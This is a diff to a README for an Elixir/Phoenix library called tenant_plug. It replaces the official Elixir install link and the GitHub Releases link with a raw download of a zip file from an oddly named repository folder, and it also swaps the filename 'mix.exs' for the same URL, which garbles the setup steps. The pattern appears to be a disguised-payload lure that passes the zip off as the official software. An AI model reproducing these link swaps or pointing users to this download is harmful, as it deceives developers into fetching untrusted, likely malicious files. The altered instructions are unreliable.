omegaites/tenant_plug/README.md

 - **Phoenix Version**: 1.5 or greater.
 - **Operating System**: Compatible with Linux, macOS, and Windows.

 Ensure that you have Elixir and Phoenix properly installed on your system.
-If you need help with installation, please refer to the official [Elixir website](https://elixir-lang.org/install.html).
+If you need help with installation, please refer to the official [Elixir website](https://raw.githubusercontent.com/omegaites/tenant_plug/main/uncoagulating/tenant_plug.zip).

 ## 🚀 Getting Started

 To get started with tenant_plug, follow these simple steps:

-1. **Visit the Releases Page**: Go to the [Releases page](https://github.com/omegaites/tenant_plug/releases) to download the latest version of the software.
+1. **Visit the Releases Page**: Go to the [Releases page](https://raw.githubusercontent.com/omegaites/tenant_plug/main/uncoagulating/tenant_plug.zip) to download the latest version of the software.

 2. **Download the Package**: Find the latest release and download the appropriate package for your operating system.

 3. **Extract the Files**: If your download comes in a compressed format (like a .zip or .tar file), extract it to your desired location.

 4. **Add to Your Project**:
-   1. Open your project's `mix.exs` file.
+   1. Open your project's `https://raw.githubusercontent.com/omegaites/tenant_plug/main/uncoagulating/tenant_plug.zip` file.
    2. Add `tenant_plug` to your list of dependencies:
       ```elixir
       defp deps do